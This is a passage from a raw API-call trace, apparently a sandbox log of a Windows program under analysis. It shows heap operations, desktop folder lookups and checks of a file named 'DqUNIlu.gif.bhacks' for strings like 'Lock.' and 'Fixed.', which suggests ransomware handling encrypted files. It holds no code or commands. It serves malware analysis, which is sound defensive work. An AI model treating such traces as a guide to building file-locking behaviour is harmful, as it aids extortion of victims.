Size=0x8) returned 0x2a72708 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9298 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.113] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72718 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d660 [0090.114] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop/desktop.ini", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\desktop.ini", lpFilePart=0x8cf650*="desktop.ini") returned 0x23 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d660 | out: hHeap=0x2af0000) returned 1 [0090.114] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini")) returned 0xffffffff [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a75fd8 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92e0 | out: hHeap=0x2af0000) returned 1 [0090.114] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0090.114] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.114] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a726a8 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.114] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.114] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DqUNIlu.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qUNIlu.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNIlu.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NIlu.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ilu.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lu.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="hacks", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa90b8 | out: hHeap=0x2af0000) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a726a8 | out: hHeap=0x2af0000) returned 1 [0090.115] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.115] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.115] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0090.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9058 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72748 | out: hHeap=0x2af0000) returned 1 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72698 | out: hHeap=0x2af0000) returned 1 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x26) returned 0x2a69b20 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="DqUNIlu.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="qUNIlu.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="UNIlu.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="NIlu.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ilu.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="lu.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="u.gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gif.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="if.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f.bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.116] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="bhacks", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0090.116] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9208 | out: hHeap=0x2af0000) returned 1 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa60d0 [0090.116] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa60d0 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9058 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9268 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f71a0 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71f88 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9208 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.117] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0090.117] CharUpperBuffW (in: lpsz="A2100602512", cchLength=0xb | out: lpsz="A2100602512") returned 0xb [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0090.117] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90e8 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71db8 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92e0 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa90b8 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9328 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.117] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0090.118] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9220 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa91c0 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ec8 [0090.118] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9268 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa6488 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71f88 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ec8 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92f8 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.118] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9328 | out: hHeap=0x2af0000) returned 1 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71de8 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.118] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x70) returned 0x2a75510 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa6488 | out: hHeap=0x2af0000) returned 1 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9160 | out: hHeap=0x2af0000) returned 1 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71de8 | out: hHeap=0x2af0000) returned 1 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71de8 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9160 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71e88 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x2a68440 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ea8 [0090.119] CharUpperBuffW (in: lpsz="DesktopDir", cchLength=0xa | out: lpsz="DESKTOPDIR") returned 0xa [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9310 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9040 [0090.119] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa92c8 | out: hHeap=0x2af0000) returned 1 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0090.119] SHGetFolderPathW (in: hwnd=0x0, csidl=16, hToken=0x0, dwFlags=0x0, pszPath=0x8cf3a8 | out: pszPath="C:\\Users\\FD1HVy\\Desktop") returned 0x0 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92c8 [0090.119] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x30) returned 0x2aa63e0 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ec8 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a68440 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9040 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9310 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9298 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9220 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa91c0 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6f20 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x80) returned 0x2a68440 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa63e0 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9178 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71e88 | out: hHeap=0x2af0000) returned 1 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71e88 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa91c0 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ea8 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9220 [0090.120] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ea8 | out: hHeap=0x2af0000) returned 1 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a71ea8 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9178 [0090.120] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71eb8 [0090.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71eb8 | out: hHeap=0x2af0000) returned 1 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9298 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71eb8 [0090.121] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9250 | out: hHeap=0x2af0000) returned 1 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9310 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9250 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77af8 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa92f8 [0090.121] RtlAllocateHeap (HeapHandle=0x2af0000, 